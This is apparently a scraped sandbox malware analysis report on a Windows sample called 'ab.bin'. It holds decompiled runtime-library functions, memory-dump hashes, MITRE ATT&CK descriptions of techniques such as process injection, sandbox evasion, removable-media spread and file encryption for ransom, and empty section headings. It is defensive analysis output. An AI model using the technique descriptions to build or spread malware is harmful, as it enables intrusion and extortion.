Part of subcall function 0134A72C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01303254,?,39CCA9F6), ref: 0134A73F
Part of subcall function 0134A72C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0134A770

_strftime.LIBCMT ref: 01303304
Concurrency::cancel_current_task.LIBCPMT ref: 013034A1

Strings

%Y-%m-%dT%H:%M:%S, xrefs: 013032FB

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Time$Concurrency::cancel_current_taskFileSystemUnothrow_t@std@@@__ehfuncinfo$??2@_strftime
String ID: %Y-%m-%dT%H:%M:%S
API String ID: 672592798-3293947673
Opcode ID: 5e7722d013ed2abea4ce4cb2ea9e4fc983f37f5ac1cb825cd7f6ec609052dff9
Instruction ID: e511b04233e140d0c2c7f4cdb944b110e0aebd257ff889a1654cab7c04f74226
Opcode Fuzzy Hash: 5e7722d013ed2abea4ce4cb2ea9e4fc983f37f5ac1cb825cd7f6ec609052dff9
Instruction Fuzzy Hash: 15714A71D10249DFDB15DFA8C954BEEBBF8BF18318F20062AD515AB280D774A944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0132C74F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E0132C74F(intOrPtr __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* _t32;
				void* _t34;
				signed int _t38;
				signed int _t39;
				intOrPtr _t47;
				intOrPtr _t49;
				void* _t50;
				intOrPtr* _t51;
				intOrPtr _t52;
				signed int _t53;
				void* _t63;
				intOrPtr _t65;
				void* _t66;

				_t59 = __edx;
				_t52 = __ecx;
				_push(0x30);
				E0132F1B6(0x1369031, __eflags);
				_t49 = _t52;
				 *((intOrPtr*)(_t66 - 0x10)) = _t49;
				_t32 = E01317EF8(__edx, __eflags, _t66 - 0x3c);
				_t50 = _t49 + 0x2c;
				_t53 = 0xb;
				memcpy(_t50, _t32, _t53 << 2);
				_t34 = E013506CB(_t59);
				_t65 =  *((intOrPtr*)(_t66 - 0x10));
				_t63 = _t34;
				 *((intOrPtr*)(_t66 - 0x10)) = _t65;
				 *((intOrPtr*)(_t65 + 8)) = 0;
				 *((intOrPtr*)(_t65 + 0x10)) = 0;
				 *((intOrPtr*)(_t65 + 0x14)) = 0;
				 *((intOrPtr*)(_t65 + 0x18)) = 0;
				_push(_t50);
				 *((intOrPtr*)(_t66 - 4)) = 0;
				 *((intOrPtr*)(_t65 + 8)) = E01318329(__fp0,  *((intOrPtr*)(_t63 + 0x1c)), 0);
				E0132AEF3(_t65, 0, _t63);
				if( *((char*)(_t65 + 0x28)) == 0) {
					_t38 =  *((intOrPtr*)(_t63 + 0x29));
				} else {
					_t38 =  *((intOrPtr*)(_t63 + 0x28));
				}
				_t39 = _t38;
				 *(_t65 + 0x1c) = _t39;
				if(_t39 < 0 || _t39 >= 0x7f) {
					 *(_t65 + 0x1c) =  *(_t65 + 0x1c) & 0x00000000;
				}
				_t51 = _t65 + 0x20;
				E013256D8(_t65, _t51,  *((char*)(_t63 + 0x2b)),  *((char*)(_t63 + 0x2a)),  *((char*)(_t63 + 0x2e)));
				_t47 = E013256D8(_t65, _t65 + 0x24,  *((char*)(_t63 + 0x2d)),  *((char*)(_t63 + 0x2c)),  *((char*)(_t63 + 0x2f)));
				_t75 =  *((char*)(_t66 + 0xc));
				if( *((char*)(_t66 + 0xc)) != 0) {
					_t47 = 0x76782b24;
					 *_t51 = 0x76782b24;
					 *((intOrPtr*)(_t65 + 0x24)) = 0x76782b24;
				}
				return E0132F190(_t47, _t75);
			}

0x0132c74f
0x0132c74f
0x0132c74f
0x0132c756
0x0132c75b
0x0132c75d
0x0132c764
0x0132c769
0x0132c770
0x0132c773
0x0132c775
0x0132c77a
0x0132c77d
0x0132c781
0x0132c784
0x0132c787
0x0132c78a
0x0132c78d
0x0132c790
0x0132c795
0x0132c7a0
0x0132c7a8
0x0132c7b1
0x0132c7b8
0x0132c7b3
0x0132c7b3
0x0132c7b3
0x0132c7bb
0x0132c7be
0x0132c7c3
0x0132c7ca
0x0132c7ca
0x0132c7d2
0x0132c7e3
0x0132c7fd
0x0132c802
0x0132c806
0x0132c808
0x0132c80d
0x0132c80f
0x0132c80f
0x0132c817

APIs

_Mpunct.LIBCPMT ref: 0132C7E3
_Mpunct.LIBCPMT ref: 0132C7FD

Strings

$+xv, xrefs: 0132C808

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Mpunct
String ID: $+xv
API String ID: 4240859931-1686923651
Opcode ID: 377205aba8d0da8ad26aca360b18c1a2e3b5c813dbd33faf6b38e1c9cc3be93a
Instruction ID: 01b954c3a74a6e9bfe071c36cddc31020d3d4512da831c1e19278dfc470dbc84
Opcode Fuzzy Hash: 377205aba8d0da8ad26aca360b18c1a2e3b5c813dbd33faf6b38e1c9cc3be93a
Instruction Fuzzy Hash: D021A1B1800A636FD725EF78888067FBEF8AB1D614F14495AE499C7A40D730E601CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012F96C0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 63%

			E012F96C0(intOrPtr _a4) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v48;
				void* __ecx;
				void* __ebp;
				signed int _t34;
				signed int _t42;
				void* _t52;
				intOrPtr _t61;
				intOrPtr _t68;
				intOrPtr _t69;
				signed int _t74;
				void* _t75;

				_push(0xffffffff);
				_push(0x136595f);
				_push( *[fs:0x0]);
				_push(_t61);
				_t34 =  *0x13a4018; // 0x39cca9f6
				_push(_t34 ^ _t72);
				 *[fs:0x0] =  &_v16;
				_t68 = _t61;
				_v20 = _t68;
				E013177B6(_t61, 0);
				_v8 = 0;
				 *((intOrPtr*)(_t68 + 4)) = 0;
				 *((char*)(_t68 + 8)) = 0;
				 *((intOrPtr*)(_t68 + 0xc)) = 0;
				 *((char*)(_t68 + 0x10)) = 0;
				 *((intOrPtr*)(_t68 + 0x14)) = 0;
				 *((short*)(_t68 + 0x18)) = 0;
				 *((intOrPtr*)(_t68 + 0x1c)) = 0;
				 *((short*)(_t68 + 0x20)) = 0;
				 *((intOrPtr*)(_t68 + 0x24)) = 0;
				 *((char*)(_t68 + 0x28)) = 0;
				 *((intOrPtr*)(_t68 + 0x2c)) = 0;
				 *((char*)(_t68 + 0x30)) = 0;
				_t39 = _a4;
				_v8 = 6;
				if(_a4 == 0) {
					E01316C89("bad locale name");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0xffffffff);
					_push(0x1365830);
					_push( *[fs:0x0]);
					_push(_t68);
					_t42 =  *0x13a4018; // 0x39cca9f6
					_push(_t42 ^ _t74);
					 *[fs:0x0] =  &_v48;
					_t69 = _t61;
					E01317AA8(_t61, _t69);
					_t46 =  *((intOrPtr*)(_t69 + 0x2c));
					_t75 = _t74 + 4;
					if( *((intOrPtr*)(_t69 + 0x2c)) != 0) {
						E01349EA4(_t46);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0x2c)) = 0;
					_t47 =  *((intOrPtr*)(_t69 + 0x24));
					if( *((intOrPtr*)(_t69 + 0x24)) != 0) {
						E01349EA4(_t47);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0x24)) = 0;
					_t48 =  *((intOrPtr*)(_t69 + 0x1c));
					if( *((intOrPtr*)(_t69 + 0x1c)) != 0) {
						E01349EA4(_t48);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0x1c)) = 0;
					_t49 =  *((intOrPtr*)(_t69 + 0x14));
					if( *((intOrPtr*)(_t69 + 0x14)) != 0) {
						E01349EA4(_t49);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0x14)) = 0;
					_t50 =  *((intOrPtr*)(_t69 + 0xc));
					if( *((intOrPtr*)(_t69 + 0xc)) != 0) {
						E01349EA4(_t50);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0xc)) = 0;
					_t51 =  *((intOrPtr*)(_t69 + 4));
					if( *((intOrPtr*)(_t69 + 4)) != 0) {
						E01349EA4(_t51);
					}
					 *((intOrPtr*)(_t69 + 4)) = 0;
					_t52 = E0131780E(_t69);
					 *[fs:0x0] = _v20;
					return _t52;
				} else {
					E01317A5D(_t61, _t68, _t39);
					 *[fs:0x0] = _v16;
					return _t68;
				}
			}

0x012f96c3
0x012f96c5
0x012f96d0
0x012f96d1
0x012f96d3
0x012f96da
0x012f96de
0x012f96e4
0x012f96e6
0x012f96eb
0x012f96f0
0x012f96f7
0x012f96fe
0x012f9702
0x012f9709
0x012f970f
0x012f9716
0x012f971a
0x012f971d
0x012f9721
0x012f9724
0x012f9727
0x012f972a
0x012f972d
0x012f9730
0x012f9736
0x012f975b
0x012f9760
0x012f9761
0x012f9762
0x012f9763
0x012f9764
0x012f9765
0x012f9766
0x012f9767
0x012f9768
0x012f9769
0x012f976a
0x012f976b
0x012f976c
0x012f976d
0x012f976e
0x012f976f
0x012f9773
0x012f9775
0x012f9780
0x012f9781
0x012f9782
0x012f9789
0x012f978d
0x012f9793
0x012f9796
0x012f979b
0x012f979e
0x012f97a3
0x012f97a6
0x012f97ab
0x012f97ab
0x012f97ae
0x012f97b5
0x012f97ba
0x012f97bd
0x012f97c2
0x012f97c2
0x012f97c5
0x012f97cc
0x012f97d1
0x012f97d4
0x012f97d9
0x012f97d9
0x012f97dc
0x012f97e3
0x012f97e8
0x012f97eb
0x012f97f0
0x012f97f0
0x012f97f3
0x012f97fa
0x012f97ff
0x012f9802
0x012f9807
0x012f9807
0x012f980a
0x012f9811
0x012f9816
0x012f9819
0x012f981e
0x012f9823
0x012f982a
0x012f9832
0x012f983e
0x012f9738
0x012f973a
0x012f9747
0x012f9753
0x012f9753

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 012F96EB
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 012F973A

Strings

bad locale name, xrefs: 012F9756

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: aac7d3413559320cadd453151c8f9d016ed22d80bf31e3c3918f71989a4efd19
Instruction ID: 1a6891707903cbb49feffaae1053386ec59f8f858759059bb477973c1e5d3fbf
Opcode Fuzzy Hash: aac7d3413559320cadd453151c8f9d016ed22d80bf31e3c3918f71989a4efd19
Instruction Fuzzy Hash: 0B11A0B1904B449FD320CF69C800B57BBF8EF19714F008A5EE499C7B40D7B5A604CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 01319FF5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 56%

			E01319FF5(intOrPtr __ecx, void* __edx, void* __eflags, void* __fp0) {
				intOrPtr _t28;
				char _t37;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr* _t45;
				intOrPtr _t46;
				void* _t47;
				void* _t53;

				_t53 = __fp0;
				_t50 = __eflags;
				_t44 = __edx;
				_t40 = __ecx;
				_push(0x34);
				E0132F1EA(0x1368813, __eflags);
				_t46 = _t40;
				_t45 = E013506CB(__edx);
				E01317EF8(__edx, __eflags, _t47 - 0x3c);
				 *((intOrPtr*)(_t47 - 0x40)) = _t46;
				 *((intOrPtr*)(_t46 + 8)) = 0;
				 *((intOrPtr*)(_t46 + 0x10)) = 0;
				 *((intOrPtr*)(_t46 + 0x14)) = 0;
				 *((intOrPtr*)(_t47 - 4)) = 0;
				E01317EF8(_t44, _t50, _t47 - 0x3c);
				_t39 =  *((intOrPtr*)(_t47 + 0xc));
				_t28 = 0x13836c2;
				if(_t39 == 0) {
					_t28 =  *((intOrPtr*)(_t45 + 8));
				}
				_push(_t47 - 0x3c);
				 *((intOrPtr*)(_t46 + 8)) = E01318329(_t53, _t28, 0);
				_push(_t47 - 0x3c);
				 *((intOrPtr*)(_t46 + 0x10)) = E01318329(_t53, "false", 0);
				_push(_t47 - 0x3c);
				 *((intOrPtr*)(_t46 + 0x14)) = E01318329(_t53, "true", 0);
				_t52 = _t39;
				if(_t39 == 0) {
					 *((char*)(_t46 + 0xc)) =  *((intOrPtr*)( *_t45));
					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4))));
				} else {
					 *((char*)(_t46 + 0xc)) = 0x2e;
					_t37 = 0x2c;
				}
				 *((char*)(_t46 + 0xd)) = _t37;
				return E0132F1A5(_t37, _t52);
			}

0x01319ff5
0x01319ff5
0x01319ff5
0x01319ff5
0x01319ff5
0x01319ffc
0x0131a001
0x0131a008
0x0131a00e
0x0131a015
0x0131a018
0x0131a01b
0x0131a01e
0x0131a021
0x0131a028
0x0131a02d
0x0131a030
0x0131a039
0x0131a03b
0x0131a03b
0x0131a041
0x0131a04a
0x0131a050
0x0131a05d
0x0131a063
0x0131a073
0x0131a076
0x0131a078
0x0131a086
0x0131a08c
0x0131a07a
0x0131a07a
0x0131a07e
0x0131a07e
0x0131a08e
0x0131a096

APIs

__EH_prolog3_GS.LIBCMT ref: 01319FFC

Strings

false, xrefs: 0131A053
true, xrefs: 0131A066

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: H_prolog3_
String ID: false$true
API String ID: 2427045233-2658103896
Opcode ID: 175be7d4f3eec92c77711b954605e499ed353ad4eb2a789d598213b9cebd2bef
Instruction ID: aa31811369f4be36d9bee926168efcb1f96eb2e58084bb27e7fd78d49b97fb0a
Opcode Fuzzy Hash: 175be7d4f3eec92c77711b954605e499ed353ad4eb2a789d598213b9cebd2bef
Instruction Fuzzy Hash: 04110875D41742AEC728EFB8D440B8ABBF4BF19208F14895AE4E5CB750DB70E504CB60

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report ab.bin

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Dropped Files

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre